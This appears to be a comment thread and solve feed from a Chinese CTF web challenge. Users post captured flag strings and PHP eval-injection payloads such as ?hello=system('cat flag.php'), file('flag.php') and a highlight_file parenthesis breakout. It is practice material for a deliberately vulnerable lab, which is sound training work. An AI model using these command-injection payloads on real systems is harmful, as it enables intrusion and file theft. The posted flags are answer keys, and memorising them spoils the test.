评分(9)
解题动态
kfdwty 攻破了该题 19小时前
z791458703 攻破了该题 1天前
buxixi 攻破了该题 1天前
1720713439 攻破了该题 1天前
shbshb123 攻破了该题 1天前
18075013015 攻破了该题 1天前
dkwang 攻破了该题 2天前
Gsparrow 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
别偷我后场 攻破了该题 3天前
Ta7suya 攻破了该题 3天前
liyuanchao 攻破了该题 3天前
qweQWERT 攻破了该题 3天前
咔咔 攻破了该题 3天前
lishenyuchen 攻破了该题 3天前
摇曳露营芝麻凛 攻破了该题 3天前
1745085539 攻破了该题 4天前
3287973822 攻破了该题 4天前
评论
xiaojiang8 1年前
举报
flag{42514ad5a472a1c17919a0cf12eb1aa9};
wxy1343 1年前
举报
flag{616da37fa93c4832b309a22168ca486d}
不知名学渣 1年前
举报
/?hello=file_get_contents(%27flag.php%27),用file_get_contents也可以读取,就是不知道为什么无法在浏览器中显示出来?只能在F12源码中能看到被注释的flag.php内容?恳求大佬解答。
19963445106 23天前
举报
因为这是php文件,用cat和tac读也是,cat的结果只能看源码,tac因为php结构被破坏所以直接显示
StevenXu 1年前
举报
<php
always 1年前
举报
http://114.67.175.224:19137/?hello=$GLOBALS
MuYangfool 1年前
举报
?hello=);highlight_file(%27flag.php%27);var_dump(
我爱你制杖 1年前
举报
解题思路: 1.利用eval()函数可将函数中的参数当作php代码执行,故可通过命令执行漏洞system()函数去查看当前目录中的内容(如本题:?hello=system(".")来查看,获得flag.php文件名) 2.利用file()函数读取flag.php文件内容(如本题:?hello=file("flag.php"),需注意此处存在var_dun
五无心惘然 1年前
举报
flag{78096610f3a54eda62265ae8d6835aab}
18244914085 1年前
举报
直接使用system查看包含的文件flag.php, eval执行变量$a ?hello=system('cat flag.php | base64')
Lsec 1年前
举报
1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))
你呀你ii 2年前
举报
?hello=eval(system('cat flag.php | base64'))
baianquanzu 1年前
举报
?hello=system('sort flag.php')
xlxlxl 2年前
举报
?hello=system('cat flag.php')
凉情梦回 2年前
举报
?hello=system('cat flag.php')
liu666 2年前
举报
flag{930e51a7a500775093c95aae8b67e404}
userdong 2年前
举报
?hello=system('cat flag.php')
riacky 2年前
举报
?hello=system('cat flag*')